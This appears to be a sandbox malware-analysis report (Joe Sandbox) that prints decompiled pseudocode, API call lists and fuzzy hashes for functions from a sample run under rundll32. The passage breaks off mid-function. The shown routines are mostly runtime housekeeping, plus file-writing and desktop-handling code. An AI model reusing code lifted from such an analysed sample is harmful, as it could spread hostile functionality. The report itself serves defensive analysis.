                                                                                              0x042729fa

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(00000054), ref: 04272959
                                                                                              • RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0427295F
                                                                                              • RtlLeaveCriticalSection.NTDLL(-0000006C), ref: 0427297F
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04272982
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: c16b0b0f03fbccc662366d724c5ef5cf890049977a06a6dd716950ac4f9ecc30
                                                                                              • Instruction ID: efc624c55feec55ab75d90634b465093c33a8b94bc9a408440990d6cf050ce44
                                                                                              • Opcode Fuzzy Hash: c16b0b0f03fbccc662366d724c5ef5cf890049977a06a6dd716950ac4f9ecc30
                                                                                              • Instruction Fuzzy Hash: FA018C32600209FBDB11EF69EC88BDAFBB8FF44310F244159EE0463251C774BA95DAA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E0426A160(WCHAR* __ecx) {
                                                                                              				long _v8;
                                                                                              				void* _t14;
                                                                                              				struct _OVERLAPPED* _t17;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t17 = 0;
                                                                                              				if(__ecx == 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t14 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                              					if(_t14 != 0xffffffff) {
                                                                                              						SetFilePointer(_t14, 0, 0, 0);
                                                                                              						E0426A110();
                                                                                              						_v8 = 0;
                                                                                              						WriteFile(_t14, 0x42a4d18, 0x1600,  &_v8, 0);
                                                                                              						_t17 =  !=  ? 1 : 0;
                                                                                              						CloseHandle(_t14);
                                                                                              					}
                                                                                              					return _t17;
                                                                                              				}
                                                                                              			}






                                                                                              0x0426a163
                                                                                              0x0426a165
                                                                                              0x0426a169
                                                                                              0x0426a1d0
                                                                                              0x0426a16b
                                                                                              0x0426a182
                                                                                              0x0426a187
                                                                                              0x0426a18d
                                                                                              0x0426a193
                                                                                              0x0426a19c
                                                                                              0x0426a1ab
                                                                                              0x0426a1b9
                                                                                              0x0426a1bc
                                                                                              0x0426a1bc
                                                                                              0x0426a1c9
                                                                                              0x0426a1c9

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,76A1ED80,76A1F660,?,?,0426A916), ref: 0426A17C
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0426A916), ref: 0426A18D
                                                                                              • WriteFile.KERNEL32(00000000,042A4D18,00001600,0426A916,00000000,?,0426A916), ref: 0426A1AB
                                                                                              • CloseHandle.KERNEL32(00000000,?,0426A916), ref: 0426A1BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3604237281-0
                                                                                              • Opcode ID: 724d9715875e6162207b727c7016248ca16c0d2d266f86dbbcc5ee5e0665163c
                                                                                              • Instruction ID: 3e047f009b916da282b43f95ec7118abc1b13858608770a548362e055d267138
                                                                                              • Opcode Fuzzy Hash: 724d9715875e6162207b727c7016248ca16c0d2d266f86dbbcc5ee5e0665163c
                                                                                              • Instruction Fuzzy Hash: 91F0C83131222477D634667A7C0DFEBBF9CDF87BB2F100259BC0AE2180C9655C0186E4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 19%
                                                                                              			E04292289(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				void* _t25;
                                                                                              				void* _t27;
                                                                                              				void* _t28;
                                                                                              				void* _t29;
                                                                                              				intOrPtr _t30;
                                                                                              				intOrPtr* _t32;
                                                                                              				void* _t34;
                                                                                              
                                                                                              				_t29 = __edx;
                                                                                              				_t27 = __ebx;
                                                                                              				_t36 = _a28;
                                                                                              				_t30 = _a8;
                                                                                              				if(_a28 != 0) {
                                                                                              					_push(_a28);
                                                                                              					_push(_a24);
                                                                                              					_push(_t30);
                                                                                              					_push(_a4);
                                                                                              					E042928D8(_t36);
                                                                                              					_t34 = _t34 + 0x10;
                                                                                              				}
                                                                                              				_t37 = _a40;
                                                                                              				_push(_a4);
                                                                                              				if(_a40 != 0) {
                                                                                              					_push(_a40);
                                                                                              				} else {
                                                                                              					_push(_t30);
                                                                                              				}
                                                                                              				E04291D8F(_t28);
                                                                                              				_t32 = _a32;
                                                                                              				_push( *_t32);
                                                                                              				_push(_a20);
                                                                                              				_push(_a16);
                                                                                              				_push(_t30);
                                                                                              				E04292ADA(_t27, _t28, _t29, _t30, _t37);
                                                                                              				_push(0x100);
                                                                                              				_push(_a36);
                                                                                              				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                                                                                              				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                                              				_push(_a20);
                                                                                              				_push(_a12);
                                                                                              				_push(_t30);
                                                                                              				_push(_a4);
                                                                                              				_t25 = E04292093(_t29, _t32, _t37);
                                                                                              				if(_t25 != 0) {
                                                                                              					E04291D5D(_t25, _t30);
                                                                                              					return _t25;
                                                                                              				}
                                                                                              				return _t25;
                                                                                              			}













                                                                                              0x04292289
                                                                                              0x04292289
                                                                                              0x0429228c
                                                                                              0x04292291
                                                                                              0x04292294
                                                                                              0x04292296
                                                                                              0x04292299
                                                                                              0x0429229c
                                                                                              0x0429229d
                                                                                              0x042922a0
                                                                                              0x042922a5
                                                                                              0x042922a5
                                                                                              0x042922a8
                                                                                              0x042922ac
                                                                                              0x042922af
                                                                                              0x042922b4
                                                                                              0x042922b1
                                                                                              0x042922b1
                                                                                              0x042922b1
                                                                                              0x042922b7
                                                                                              0x042922bd
                                                                                              0x042922c0
                                                                                              0x042922c2
                                                                                              0x042922c5
                                                                                              0x042922c8
                                                                                              0x042922c9
                                                                                              0x042922d2
                                                                                              0x042922d7
                                                                                              0x042922da
                                                                                              0x042922e0
                                                                                              0x042922e3
                                                                                              0x042922e6
                                                                                              0x042922e9
                                                                                              0x042922ea
                                                                                              0x042922ed
                                                                                              0x042922f8
                                                                                              0x042922fc
                                                                                              0x00000000
                                                                                              0x042922fc
                                                                                              0x04292303

                                                                                              APIs
                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 042922A0
                                                                                                • Part of subcall function 042928D8: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 04292907
                                                                                                • Part of subcall function 042928D8: ___AdjustPointer.LIBCMT ref: 04292922
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 042922B7
                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 042922C9
                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 042922ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                              • String ID:
                                                                                              • API String ID: 2901542994-0
                                                                                              • Opcode ID: a49743d0ee214a8ebd8d6164258b81ed28dcef750fb56b9d151e4ec3bef8cbb7
                                                                                              • Instruction ID: d8f23910e2177bd588bb7dc7cc1f94d26661fb926c016f6a40cf1843ae59d721
                                                                                              • Opcode Fuzzy Hash: a49743d0ee214a8ebd8d6164258b81ed28dcef750fb56b9d151e4ec3bef8cbb7
                                                                                              • Instruction Fuzzy Hash: 07011732610109FBEF125F55CC00EEA3BBAEF49714F044954FD1866120D772E8A1DBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E04271970(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                              				long _t14;
                                                                                              				long _t18;
                                                                                              				void* _t22;
                                                                                              				intOrPtr* _t23;
                                                                                              				intOrPtr* _t27;
                                                                                              				intOrPtr _t29;
                                                                                              
                                                                                              				_t23 = __ecx;
                                                                                              				_t22 = __ebx;
                                                                                              				_t27 = __ecx;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _a4;
                                                                                              				 *((intOrPtr*)(__ecx + 8)) = _a8;
                                                                                              				if( *0x42a7b70 == 0) {
                                                                                              					 *0x42a7b70 = timeGetTime();
                                                                                              				}
                                                                                              				_t14 = InterlockedIncrement(0x42a7b70);
                                                                                              				if(_t14 == 0) {
                                                                                              					_t14 = InterlockedIncrement(0x42a7b70);
                                                                                              				}
                                                                                              				_t29 = _a12;
                                                                                              				 *(_t27 + 0x1c) = _t14;
                                                                                              				E04271A00(_t22, _t27, _t29);
                                                                                              				 *((intOrPtr*)( *_t27))(_t29, _t23);
                                                                                              				_t18 = timeGetTime();
                                                                                              				 *(_t27 + 0x18) = _t18;
                                                                                              				 *(_t27 + 0x10) = _t18;
                                                                                              				 *((intOrPtr*)(_t27 + 0x14)) = 0;
                                                                                              				 *((intOrPtr*)(_t27 + 0xc)) = 0;
                                                                                              				 *((intOrPtr*)(_t27 + 0x24)) = 1;
                                                                                              				E04271DE0(_t27);
                                                                                              				return _t27;
                                                                                              			}









                                                                                              0x04271970
                                                                                              0x04271970
                                                                                              0x04271978
                                                                                              0x0427197a
                                                                                              0x04271980
                                                                                              0x0427198a
                                                                                              0x04271992
                                                                                              0x04271992
                                                                                              0x042719a2
                                                                                              0x042719a6
                                                                                              0x042719ad
                                                                                              0x042719ad
                                                                                              0x042719af
                                                                                              0x042719b6
                                                                                              0x042719b9
                                                                                              0x042719c3
                                                                                              0x042719c5
                                                                                              0x042719cd
                                                                                              0x042719d0
                                                                                              0x042719d3
                                                                                              0x042719da
                                                                                              0x042719e1
                                                                                              0x042719e8
                                                                                              0x042719f2

                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 0427198C
                                                                                              • InterlockedIncrement.KERNEL32(042A7B70), ref: 042719A2
                                                                                              • InterlockedIncrement.KERNEL32(042A7B70), ref: 042719AD
                                                                                              • timeGetTime.WINMM ref: 042719C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                              • String ID:
                                                                                              • API String ID: 159728177-0
                                                                                              • Opcode ID: 97a7748a66bb960e74d9216547916bd3e77d23543b81036e9319623202d8bb60
                                                                                              • Instruction ID: f1f0428acec207a8ab2684f9732637f3269f93f8c5df85ca92e5351a7c238a19
                                                                                              • Opcode Fuzzy Hash: 97a7748a66bb960e74d9216547916bd3e77d23543b81036e9319623202d8bb60
                                                                                              • Instruction Fuzzy Hash: C60125B5B11205AFC700EF69E408B5ABBE8FF89350F00452AE804C3740DBB4A865CFE4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042720F0(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				void* _t7;
                                                                                              				intOrPtr* _t9;
                                                                                              				intOrPtr _t12;
                                                                                              				struct _CRITICAL_SECTION* _t15;
                                                                                              
                                                                                              				_t12 = _a4;
                                                                                              				_t9 = __ecx;
                                                                                              				_t2 = _t12 + 0x54; // 0x54
                                                                                              				_t15 = _t2;
                                                                                              				EnterCriticalSection(_t15);
                                                                                              				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x30)) == 0) {
                                                                                              					LeaveCriticalSection(_t15);
                                                                                              					return 2;
                                                                                              				} else {
                                                                                              					SetLastError(0);
                                                                                              					_t7 =  *((intOrPtr*)( *_t9 + 0xdc))(_t12);
                                                                                              					LeaveCriticalSection(_t15);
                                                                                              					return _t7;
                                                                                              				}
                                                                                              			}







                                                                                              0x042720f6
                                                                                              0x042720f9
                                                                                              0x042720fb
                                                                                              0x042720fb
                                                                                              0x042720ff
                                                                                              0x04272107
                                                                                              0x0427213a
                                                                                              0x04272146
                                                                                              0x0427210f
                                                                                              0x04272111
                                                                                              0x0427211c
                                                                                              0x04272125
                                                                                              0x04272131
                                                                                              0x04272131

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(00000054), ref: 042720FF
                                                                                              • SetLastError.KERNEL32(00000000,?,80004005,80004005,?,?,04272885,?,?,?,00000000,0000009C,00000000,?,?,00000000), ref: 04272111
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 04272125
                                                                                              • RtlLeaveCriticalSection.NTDLL(00000054), ref: 0427213A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$EnterErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3832147951-0
                                                                                              • Opcode ID: 0a51ad4a513c396db44869a279f77c1b3062e602a7e598d42b860d65254f9365
                                                                                              • Instruction ID: b07d688d774aa6fe87707dea0e3d51152ad4367b87a9319b08d22bc4d59881c3
                                                                                              • Opcode Fuzzy Hash: 0a51ad4a513c396db44869a279f77c1b3062e602a7e598d42b860d65254f9365
                                                                                              • Instruction Fuzzy Hash: DDF0673A305210ABD7042AA9A84CAAAF76DEB85666F150036F605C33018A34AC1686B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0425A330() {
                                                                                              				void* _v8;
                                                                                              				char _v12;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v16;
                                                                                              				char _v20;
                                                                                              				int _t12;
                                                                                              				void* _t14;
                                                                                              				void* _t15;
                                                                                              
                                                                                              				_v20 = E042599B0;
                                                                                              				_v16 = 0;
                                                                                              				_v12 = 1;
                                                                                              				_v8 = CreateEventW(0, 0, 0, 0);
                                                                                              				_t15 = E0427F897(_t14, 0, 0, E04265400,  &_v20, 0, 0);
                                                                                              				WaitForSingleObject(_v8, 0xffffffff);
                                                                                              				_t12 = CloseHandle(_v8);
                                                                                              				if(_t15 != 0xffffffff) {
                                                                                              					return CloseHandle(_t15);
                                                                                              				}
                                                                                              				return _t12;
                                                                                              			}










                                                                                              0x0425a33f
                                                                                              0x0425a346
                                                                                              0x0425a34d
                                                                                              0x0425a35b
                                                                                              0x0425a373
                                                                                              0x0425a37a
                                                                                              0x0425a383
                                                                                              0x0425a38c
                                                                                              0x00000000
                                                                                              0x0425a38f
                                                                                              0x0425a399

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0425A351
                                                                                              • WaitForSingleObject.KERNEL32(0426B6BC,000000FF), ref: 0425A37A
                                                                                              • CloseHandle.KERNEL32(0426B6BC), ref: 0425A383
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0425A38F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreateEventObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 3071945061-0
                                                                                              • Opcode ID: 8cbe506e9328b2746eccbc002e59f4e69cd87a4eea1428c9c6fd73eb08c765e4
                                                                                              • Instruction ID: 4e7e07bae2233475d216c08bdbe444dd99d12b091f40a4675eee53c3d5a1dcd3
                                                                                              • Opcode Fuzzy Hash: 8cbe506e9328b2746eccbc002e59f4e69cd87a4eea1428c9c6fd73eb08c765e4
                                                                                              • Instruction Fuzzy Hash: D9F06831B44214BFE7106BA89C0EB9DBB74EB00715F700345F924791D0DBB52D5147C9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04256820(intOrPtr* __ecx) {
                                                                                              				int _t14;
                                                                                              				intOrPtr* _t16;
                                                                                              
                                                                                              				_t16 = __ecx;
                                                                                              				 *__ecx = 0x429df68;
                                                                                              				CloseDesktop( *(__ecx + 0xc));
                                                                                              				DeleteDC( *(_t16 + 0x18));
                                                                                              				ReleaseDC(0,  *(_t16 + 0x14));
                                                                                              				E04275B0F( *((intOrPtr*)(_t16 + 0x10)));
                                                                                              				E04275B0F( *((intOrPtr*)(_t16 + 0x88)));
                                                                                              				E04275B0F( *((intOrPtr*)(_t16 + 0x84)));
                                                                                              				 *_t16 = 0x429e8b0;
                                                                                              				_t14 = CloseHandle( *(_t16 + 8));
                                                                                              				 *_t16 = 0x429e8c0;
                                                                                              				return _t14;
                                                                                              			}





                                                                                              0x04256821
                                                                                              0x04256826
                                                                                              0x0425682c
                                                                                              0x04256835
                                                                                              0x04256840
                                                                                              0x04256849
                                                                                              0x04256854
                                                                                              0x0425685f
                                                                                              0x04256867
                                                                                              0x04256870
                                                                                              0x04256876
                                                                                              0x0425687d

                                                                                              APIs
                                                                                              • CloseDesktop.USER32(?,?,042567FB), ref: 0425682C
                                                                                              • DeleteDC.GDI32(?), ref: 04256835
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 04256840
                                                                                              • CloseHandle.KERNEL32(?), ref: 04256870
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteDesktopHandleRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3596899788-0
                                                                                              • Opcode ID: 37bccfb7a6fe885b1f43d086396adbc9ed3ce95efdef62890c048cee215e44d5
                                                                                              • Instruction ID: c06a16914858051bdef5176c964a54216693ab518e2e46b6c7c0cffcfd4b718b
                                                                                              • Opcode Fuzzy Hash: 37bccfb7a6fe885b1f43d086396adbc9ed3ce95efdef62890c048cee215e44d5
                                                                                              • Instruction Fuzzy Hash: 2CF01531224601EFEB223FA8EC08A06BBF1FF04205B01592CE58A419B4DB317C96EB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0426AB30() {
                                                                                              
                                                                                              				if(GetTickCount() >= 0x493e0) {
                                                                                              					Sleep(0x3e8);
                                                                                              				} else {
                                                                                              					Sleep(0x1388);
                                                                                              				}
                                                                                              				SetProcessShutdownParameters(0, 0);
                                                                                              				SetConsoleCtrlHandler(E0426AAF0, 1);
                                                                                              				return 0;
                                                                                              			}



                                                                                              0x0426ab3b
                                                                                              0x0426ab49
                                                                                              0x0426ab3d
                                                                                              0x0426ab49
                                                                                              0x0426ab49
                                                                                              0x0426ab53
                                                                                              0x0426ab60
                                                                                              0x0426ab68

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 0426AB30
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0426AB49
                                                                                              • SetProcessShutdownParameters.KERNEL32(00000000,00000000), ref: 0426AB53
                                                                                              • SetConsoleCtrlHandler.KERNEL32(0426AAF0,00000001), ref: 0426AB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ConsoleCountCtrlHandlerParametersProcessShutdownSleepTick
                                                                                              • String ID:
                                                                                              • API String ID: 4201418100-0
                                                                                              • Opcode ID: c02d4d1aa5e1ee2a31e078a717df0fa038094a05d0541946bbd8af89128a3d73
                                                                                              • Instruction ID: 29ea6b991e0a9cf67d6e8d7020aa71ae17b0da86f7590aa1156735db1245e5cb
                                                                                              • Opcode Fuzzy Hash: c02d4d1aa5e1ee2a31e078a717df0fa038094a05d0541946bbd8af89128a3d73
                                                                                              • Instruction Fuzzy Hash: 6AD0C7713A8300A7D7502BB4BC5EF19B669E736B03F614511F303E80C4DED95DC1961A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0427DB97() {
                                                                                              				void* _t4;
                                                                                              				void* _t8;
                                                                                              
                                                                                              				E0427E5D4();
                                                                                              				E0427EA0B();
                                                                                              				if(E0427E731() != 0) {
                                                                                              					_t4 = E0427E6E3(_t8, __eflags);
                                                                                              					__eflags = _t4;
                                                                                              					if(_t4 != 0) {
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						E0427E76D();
                                                                                              						goto L1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}





                                                                                              0x0427db97
                                                                                              0x0427db9c
                                                                                              0x0427dba8
                                                                                              0x0427dbad
                                                                                              0x0427dbb2
                                                                                              0x0427dbb4
                                                                                              0x0427dbbf
                                                                                              0x0427dbb6
                                                                                              0x0427dbb6
                                                                                              0x00000000
                                                                                              0x0427dbb6
                                                                                              0x0427dbaa
                                                                                              0x0427dbaa
                                                                                              0x0427dbac
                                                                                              0x0427dbac

                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 0427DB97
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0427DB9C
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0427DBA1
                                                                                                • Part of subcall function 0427E731: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0427E742
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0427DBB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 90af196cda55108680ff47b4e768e35a0272263bcaebf346e9c7f258eb3dae4a
                                                                                              • Instruction ID: d9a9b4ba45bd82b732fe7af74116520c9fc0900f2f7ca9a6196393f31156dabc
                                                                                              • Opcode Fuzzy Hash: 90af196cda55108680ff47b4e768e35a0272263bcaebf346e9c7f258eb3dae4a
                                                                                              • Instruction Fuzzy Hash: B6C0486437028A54BE903FB123A43AD63002EE24CCBCBA0D1D8522B506AE3A341A6577
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 66%
                                                                                              			E042606C0(void* __esi, signed int _a4, signed int _a8, char _a12) {
                                                                                              				intOrPtr* _v0;
                                                                                              				intOrPtr _v12;
                                                                                              				char _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				signed int _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __ebp;
                                                                                              				signed int _t75;
                                                                                              				signed int _t79;
                                                                                              				intOrPtr* _t86;
                                                                                              				unsigned int _t115;
                                                                                              				signed int _t117;
                                                                                              				signed int _t118;
                                                                                              				signed int _t122;
                                                                                              				signed int _t140;
                                                                                              				intOrPtr _t142;
                                                                                              				signed int* _t146;
                                                                                              				signed int* _t148;
                                                                                              				signed int _t149;
                                                                                              				signed int _t158;
                                                                                              				void* _t160;
                                                                                              				void* _t161;
                                                                                              				signed int _t162;
                                                                                              				signed int _t164;
                                                                                              				signed int _t167;
                                                                                              				signed int _t169;
                                                                                              				signed int _t175;
                                                                                              				signed int _t182;
                                                                                              				signed int _t186;
                                                                                              				signed int _t189;
                                                                                              				void* _t191;
                                                                                              				signed int _t193;
                                                                                              				unsigned int _t195;
                                                                                              				signed int _t196;
                                                                                              				signed int _t199;
                                                                                              				intOrPtr _t200;
                                                                                              				intOrPtr _t205;
                                                                                              
                                                                                              				_t187 = __esi;
                                                                                              				_t75 = _a4;
                                                                                              				if(_t75 != 0) {
                                                                                              					__eflags = _t75 - 0x3fffffff;
                                                                                              					if(__eflags > 0) {
                                                                                              						E04276A13(__eflags);
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						_t140 = _t75 << 2;
                                                                                              						__eflags = _t140 - 0x1000;
                                                                                              						if(__eflags < 0) {
                                                                                              							return E04275B14(__esi, __eflags, _t140);
                                                                                              						} else {
                                                                                              							_t2 = _t140 + 0x23; // 0x23
                                                                                              							_t148 = _t2;
                                                                                              							__eflags = _t148 - _t140;
                                                                                              							if(__eflags <= 0) {
                                                                                              								L8:
                                                                                              								E04276A13(__eflags);
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								asm("int3");
                                                                                              								_push(0xffffffff);
                                                                                              								_push(0x4292e80);
                                                                                              								_push( *[fs:0x0]);
                                                                                              								_t200 = _t199 - 0x18;
                                                                                              								_t79 =  *0x42a4008; // 0xd33db39d
                                                                                              								_push(_t79 ^ _t199);
                                                                                              								 *[fs:0x0] =  &_v20;
                                                                                              								_v24 = _t200;
                                                                                              								_t146 = _t148;
                                                                                              								_t149 = _a4;
                                                                                              								_v44 = _t149 -  *_t146 >> 2;
                                                                                              								_t182 = _a8;
                                                                                              								__eflags = _t182;
                                                                                              								if(_t182 != 0) {
                                                                                              									_t189 = _t146[2];
                                                                                              									_t169 = _t146[1];
                                                                                              									_a8 = _t169;
                                                                                              									__eflags = _t189 - _t169 >> 2 - _t182;
                                                                                              									if(_t189 - _t169 >> 2 >= _t182) {
                                                                                              										_push(_t149);
                                                                                              										_push(_a4);
                                                                                              										_push(_t149);
                                                                                              										__eflags = _t169 - _t149 >> 2 - _t182;
                                                                                              										_a12 =  *_a12;
                                                                                              										if(_t169 - _t149 >> 2 >= _t182) {
                                                                                              											_t191 = _t169 - (_t182 << 2);
                                                                                              											_t146[1] = E04260A00(_t191, _t169, _t169);
                                                                                              											__eflags = _a8 - _t191 - _a4;
                                                                                              											E0427D060(_a8 - _t191 - _a4, _a4, _t191 - _a4);
                                                                                              											E04260950(_a4, (_t182 << 2) + _a4,  &_a12);
                                                                                              										} else {
                                                                                              											_t193 = _t182 * 4;
                                                                                              											E04260A00(_t149, _t169, _t193 + _t149);
                                                                                              											_v12 = 2;
                                                                                              											_push(_a4);
                                                                                              											_push(_t146[1]);
                                                                                              											E04260990(_t146[1], _t182 - (_t146[1] - _a4 >> 2),  &_a12);
                                                                                              											_v12 = 0xffffffff;
                                                                                              											_t146[1] = _t146[1] + _t193;
                                                                                              											E04260950(_a4, _t146[1] - _t193,  &_a12);
                                                                                              										}
                                                                                              									} else {
                                                                                              										_t158 =  *_t146;
                                                                                              										_t175 = _t169 - _t158 >> 2;
